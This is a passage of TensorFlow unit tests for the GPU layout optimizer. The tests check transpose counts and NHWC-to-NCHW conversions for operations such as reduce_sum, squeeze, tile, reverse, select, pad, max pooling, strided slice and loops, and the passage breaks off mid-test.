if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2], keepdims=True)
squeeze = array_ops.squeeze(reduce_sum, axis=[1, 2])
output = array_ops.identity(squeeze)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSqueezeAlongNHW(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[0, 1, 2], keepdims=True)
squeeze = array_ops.squeeze(reduce_sum, axis=[0, 1, 2])
output = array_ops.identity(squeeze)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongHWC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2, 3])
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongNHW(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[0, 1, 2])
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[3])
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongCKeepDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[3], keepdims=True)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Sum-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongHKeepDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[2], keepdims=True)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongWCKeepDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[2, 3], keepdims=True)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testConcatWithControlDependency(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
axis = constant_op.constant(3)
var = variables.Variable(3)
assign = state_ops.assign(var, 6)
with ops.control_dependencies([assign]):
concat = array_ops.concat([conv, conv], axis)
output = array_ops.identity(concat)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('concat-0-0', nodes)
self.assertIn('concat-2-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testFill(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shape = array_ops.shape(conv)
scalar = array_ops.constant(5.7)
fill = array_ops.fill(shape, scalar)
output = array_ops.identity(fill)
x_val = [3.4] * 784
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
num_vec_permute = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
if _is_permute(node.name):
num_vec_permute += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
# Two vector permute nodes were initially added in the Expand phase of
# LayoutOptimizer; they cancelled out each other in the Collapse phase.
expected_vec_permute = 0
self.assertEqual(expected_vec_permute, num_vec_permute)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Fill-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testTile(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
multiple = array_ops.placeholder(dtype='int32')
tile = array_ops.tile(conv, multiple)
output = array_ops.identity(tile)
multiple_val = [2, 3, 4, 1]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={multiple: multiple_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
multiple: multiple_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Tile-0-0', nodes)
self._assert_vec_nhwc_to_nchw('Tile-1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = constant_op.constant([3, 1], name='DimsConst')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('ReverseV2-0-0', nodes)
self.assertIn('ReverseV2-1-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithNonConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = array_ops.placeholder(dtype='int32')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
dims_val = [2, 3]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={dims: dims_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
dims: dims_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('ReverseV2-0-0', nodes)
self._assert_map_nhwc_to_nchw('ReverseV2-1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOp(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
mean = math_ops.reduce_mean(conv)
condition = math_ops.less(conv, mean)
select = gen_math_ops.select(condition, conv, add)
output = array_ops.identity(select)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOpConditionUnknownShape(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
condition = array_ops.placeholder(dtype='bool')
select = gen_math_ops.select(condition, conv, add)
output = array_ops.identity(select)
condition_val = np.zeros((1, 7, 7, 64))
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={condition: condition_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={condition: condition_val})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 3
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOpScalarCondition(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
condition = constant_op.constant(True)
select = gen_math_ops.select(condition, conv, add)
output = array_ops.identity(select)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithNonConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings = array_ops.placeholder(dtype='int32')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={paddings: paddings_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
paddings: paddings_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Pad-0-0', nodes)
self._assert_vec_nhwc_to_nchw('Pad-1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool = gen_nn_ops.max_pool_v2(conv, ksize, strides, 'VALID')
output = array_ops.identity(max_pool)
strides_val = [1, 3, 2, 1]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('MaxPoolV2-0-0', nodes)
self._assert_vec_nhwc_to_nchw('MaxPoolV2-2', nodes)
self.assertIn('MaxPoolV2-1-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolGradV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool_grad = gen_nn_ops.max_pool_grad_v2(conv, conv, conv, ksize,
strides, 'VALID')
output = array_ops.identity(max_pool_grad)
strides_val = [1, 3, 2, 1]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('MaxPoolGradV2-0-0', nodes)
self._assert_vec_nhwc_to_nchw('MaxPoolGradV2-4', nodes)
self.assertIn('MaxPoolGradV2-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
size = array_ops.placeholder(dtype='int32')
s = array_ops.slice(conv, [0, 0, 0, 0], size)
output = array_ops.identity(s)
size_val = [1, 2, 3, 4]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={size: size_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
size: size_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Slice-0-0', nodes)
self._assert_vec_nhwc_to_nchw('Slice-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
s = array_ops.strided_slice(conv, [0, 0, 0, 0], end, strides=[1, 2, 3, 1])
output = array_ops.identity(s)
end_val = [1, 2, 3, 4]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('StridedSlice-0-0', nodes)
self._assert_vec_nhwc_to_nchw('StridedSlice-2', nodes)
self.assertIn('StridedSlice-1-LayoutOptimizer', nodes)
self.assertIn('StridedSlice-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithMask1011(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
# This will generate a StridedSlice op with begin mask and
# end mask 11(1011).
s = conv[:, :, 1:-1, :]
output = array_ops.identity(s)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('strided_slice-0-0', nodes)
self.assertIn('strided_slice-1-LayoutOptimizer', nodes)
self.assertIn('strided_slice-2-LayoutOptimizer', nodes)
self.assertIn('strided_slice-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithMask0111(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
# This will generate a StridedSlice op with begin mask and
# end mask 7(0111).
s = conv[:, :, :, 1:-1]
output = array_ops.identity(s)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('strided_slice-0-0', nodes)
self.assertIn('strided_slice-1-LayoutOptimizer', nodes)
self.assertIn('strided_slice-2-LayoutOptimizer', nodes)
self.assertIn('strided_slice-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceGradWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
shape = array_ops.shape(conv)
end_val = [1, 2, 3, 4]
s = array_ops.strided_slice(
conv, [0, 0, 0, 0], end_val, strides=[1, 2, 3, 1])
s_grad = array_ops.strided_slice_grad(shape, [0, 0, 0, 0], end,
[1, 2, 3, 1], s)
output = array_ops.identity(s_grad)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('StridedSliceGrad-0-0', nodes)
self._assert_vec_nhwc_to_nchw('StridedSliceGrad-2', nodes)
self.assertIn('StridedSlice-1-LayoutOptimizer', nodes)
self.assertIn('StridedSlice-2-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testShapeN(self):
if test.is_gpu_available(cuda_only=True):
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shapen = array_ops.shape_n([conv, conv])
output = math_ops.add(shapen[0], shapen[1])
x_val = [1.7] * 784
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_vec_nchw_to_nhwc('ShapeN-0-0', nodes)
self.assertAllEqual(output_val_ref, output_val)
def testShapeNFollowedByNotConvertibleNodeReshape(self):
if test.is_gpu_available(cuda_only=True):
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
conv_reshape = array_ops.reshape(conv, [1, 1, 1, -1])
shapen = array_ops.shape_n([conv, conv_reshape])
shape = array_ops.identity(shapen[1])
ones = array_ops.ones(shape)
output = math_ops.add_n([conv_reshape, ones])
x_val = [1.7] * 784
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={x: x_val})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoop(self):
if test.is_gpu_available(cuda_only=True):
output = _loop()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('map/while/Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('map/while/MaxPool_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithBranch(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_branch()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 3
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('map/while/Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('map/while/Add_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithVecAnd4D(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_vec_and_4d()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('map/while/Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('map/while/Add_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testBinaryOpSecondPort(self):
if test.is_gpu_available(cuda_only=True):
output = _model_with_second_port()
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
